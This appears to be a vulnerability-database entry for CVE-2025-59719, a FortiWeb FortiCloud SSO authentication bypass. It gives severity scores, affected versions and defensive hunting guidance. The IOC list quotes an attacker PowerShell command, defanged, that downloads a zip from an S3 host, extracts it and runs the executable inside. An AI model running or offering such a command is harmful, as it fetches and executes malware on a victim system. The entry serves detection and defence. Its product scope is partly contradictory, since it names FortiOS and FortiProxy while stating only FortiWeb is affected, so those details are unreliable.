CVE-2025-59719
published 2025-12-09


Priority: P1 (91)
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
In the wild: VulnCheck KEV
Exploited in the wild
EPSS: 23.67% (97.5th percentile)
An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.

Affected (9 ranges)

Vendor    Product             Version range
fortinet  forticloud
fortinet  fortinet
fortinet  fortios
fortinet  fortiproxy
fortinet  fortiswitchmanager
fortinet  fortiweb
fortinet  fortiweb
fortinet  fortiweb            7.4.0 – 7.4.9
fortinet  fortiweb            7.6.0 – 7.6.4

No fixed-in versions are given in this record.

Detection & IOCs (extracted from sources)

other: audit
other: backup
other: itadmin
other: secadmin
other: support
command: show full-configuration
command: Invoke-WebRequest -Uri 'hxxps://fastdlvrss[.]s3[.]us-east-1[.]amazonaws[.]com/paswr.zip' -OutFile 'C:\programdata\usoshared\Sysdmupd.zip'; Expand-Archive -Path 'C:\programdata\usoshared\Sysdmupd.zip' -DestinationPath 'c:\programdata\usoshared\' -Force; Remove-Item 'C:\programdata\usoshared\Sysdmupd.zip'; cmd /c 'c:\programdata\usoshared\java.exe';
other: WIN-X8WRBOSK0OF
other: WIN-YRSXLEONJY2
other: WIN-1J7L3SQSTMS
  • Look for FortiGate event log logid='0100044547' showing local admin account creation (e.g., 'secadmin') by [email protected]; this indicates post-exploitation persistence.
  • Exploitation is only possible when FortiCloud SSO is enabled; check for the 'admin-forticloud-sso-login' setting. The feature activates automatically when devices are registered via the FortiCare UI.
  • After SSO authentication, attackers download the full device configuration using 'show full-configuration'; monitor for this command in FortiGate CLI/audit logs.
  • Attacks are highly automated: exploitation and config exfiltration occur within seconds of initial access. Correlate rapid sequential events: SSO login → admin account creation → config download.
  • Monitor for creation of local admin accounts named 'audit', 'backup', 'itadmin', 'secadmin', or 'support' on FortiGate devices; these are attacker-created persistence accounts.
  • Attacker-controlled rogue workstations were joined to the AD domain; hunt for unexpected machine account creation, especially the names WIN-X8WRBOSK0OF, WIN-YRSXLEONJY2, and WIN-1J7L3SQSTMS.
  • Monitor for the FortiGate process named 'fortidcagent' being abused, or for unusual activity associated with it, during post-exploitation lateral movement.
  • The attacker used an 'ssl-admin' VPN account for post-exploitation access; audit VPN user accounts for unexpected entries such as 'ssl-admin'.
  • Shadowserver is tracking ~11,000 internet-exposed Fortinet devices with FortiCloud SSO enabled; use Shadowserver data to identify exposed assets in your network.
  • CVE-2025-59719 only affects FortiWeb; it is NOT exploitable unless FortiCloud SSO is enabled. FortiCloud SSO is not enabled by default but activates automatically when devices are registered via the FortiCare UI.
  • Third-party SAML IdPs and FortiAuthenticator are NOT impacted by this issue; only FortiCloud SSO is affected.
  • The initial patch (FortiOS 7.4.9) did not fully address the authentication bypass; a patch bypass was observed in the wild against fully patched devices. FortiOS 7.4.11, 7.6.6, and 8.0.0 were planned to fully remediate.
  • Attacker SSO login accounts ([email protected], [email protected]) and observed IP addresses may change as Fortinet takes action to neutralize them.
  • Affected FortiWeb versions: 8.0.0, 7.6.0–7.6.4, 7.4.0–7.4.9. FortiWeb 7.0 and 7.2 are NOT affected by CVE-2025-59719.

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        3.1      9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck           9.8    CRITICAL
cisa                9.8    CRITICAL